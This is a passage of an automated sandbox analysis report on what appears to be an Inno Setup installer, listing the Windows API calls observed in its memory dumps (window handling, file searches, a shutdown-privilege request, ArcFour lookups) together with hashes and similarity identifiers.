                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSendShowWindow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1631623395-0
                                                                                                                            • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                                            • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                                                            • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                                            • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32(?), ref: 00418393
                                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                                                            • GetWindowRect.USER32(?), ref: 004183CC
                                                                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                                                            • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                            • String ID: ,
                                                                                                                            • API String ID: 2266315723-3772416878
                                                                                                                            • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                                            • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                                                            • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                                            • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                            • API String ID: 107509674-3733053543
                                                                                                                            • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                            • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                                                            • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                            • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                                                            • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                                                            • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                             • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                             • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$CryptVersion
                                                                                                                            • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                                            • API String ID: 1951258720-508647305
                                                                                                                            • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                                            • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                                                            • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                                            • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
• SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
• FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
• FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstNext
• String ID: isRS-$isRS-???.tmp
• API String ID: 134685335-3422211394
• Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
• Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
• Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
• Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
Uniqueness

Uniqueness Score: -1.00%

APIs
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
• SetForegroundWindow.USER32(?), ref: 00457649
• NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
Strings
• Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: MessagePostWindow$ForegroundNtdllProc_
• String ID: Cannot evaluate variable because [Code] isn't running yet
• API String ID: 2236967946-3182603685
• Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
• Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
• Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
• Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
• Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
• Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
• Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
Uniqueness

Uniqueness Score: -1.00%

APIs
• IsIconic.USER32(?), ref: 00417D0F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID: ,
• API String ID: 568898626-3772416878
• Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
• Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
• Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
• Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
• FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
• FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
• FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
• Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
• Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
• Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
• FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
• FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
• FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
Similarity
• API ID: Find$File$CloseErrorFirstModeNext
• String ID:
• API String ID: 4011626565-0
• Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
• Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
• Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
• Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
• DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
• GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
• CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
• SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
Memory Dump Source
• Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1177325624-0
                                                                                                                            • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                                            • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                                                            • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                                            • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32(?), ref: 0048397A
                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                                                            • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                                                            • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Show$IconicLong
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2754861897-0
                                                                                                                            • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                                            • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                                                            • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                                            • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                                                            • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3541575487-0
                                                                                                                            • Opcode ID: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                                            • Instruction ID: e6acefadc91213b77ea930f6be1f86c6134c8588622ee3d3acab995ed1c325b6
                                                                                                                            • Opcode Fuzzy Hash: b12316252c39c0105a03a3a2020ea099ca75c42189d8bae58c1ecd15a925fcd0
                                                                                                                            • Instruction Fuzzy Hash: 87210831904B08BECB11EB65CC41ACEB7ACDB49304F5084B7E808E32A1F6789E44CE69
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32(?), ref: 004241E4
                                                                                                                            • SetActiveWindow.USER32(?,?,?,0046CD53), ref: 004241F1
                                                                                                                              • Part of subcall function 0042364C: ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                              • Part of subcall function 00423B14: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,021B25AC,0042420A,?,?,?,0046CD53), ref: 00423B4F
                                                                                                                            • SetFocus.USER32(00000000,?,?,?,0046CD53), ref: 0042421E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$ActiveFocusIconicShow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 649377781-0
                                                                                                                            • Opcode ID: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                                            • Instruction ID: c953833529836f01456b8f788e47b4b7c36f7a841d6c6df07f57e62630513da6
                                                                                                                            • Opcode Fuzzy Hash: 1be179083055f96161d8b165ddd04f1e3bd56871e014c6a07f585ac04199aa1a
                                                                                                                            • Instruction Fuzzy Hash: 8CF030B170012097CB10BFAAA8C5B9676A8AB48344F5500BBBD05DF357CA7CDC018778
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • IsIconic.USER32(?), ref: 00417D0F
                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                                            • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000F.00000002.3334516968.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3358142316.0000000000499000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3361880075.000000000049A000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3364989267.000000000049B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            • Associated: 0000000F.00000002.3368364316.00000000004AB000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_15_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Window$Placement$Iconic
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 568898626-0
                                                                                                                            • Opcode ID: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                                            • Instruction ID: d9358ea7cd183770b33139a8ac7b7a0a70302bd2c01e5fc8313c3e2814ac7f2c
                                                                                                                            • Opcode Fuzzy Hash: 19084698f29920acc68274fefc6d1be37826273bcf8ca1bc36e8902df026f6c2
                                                                                                                            • Instruction Fuzzy Hash: 33012C71204108ABDB10EE59D8C1EF673A8AF45724F154566FD19DF242D639ED8087A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000F.00000002.3340994250.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
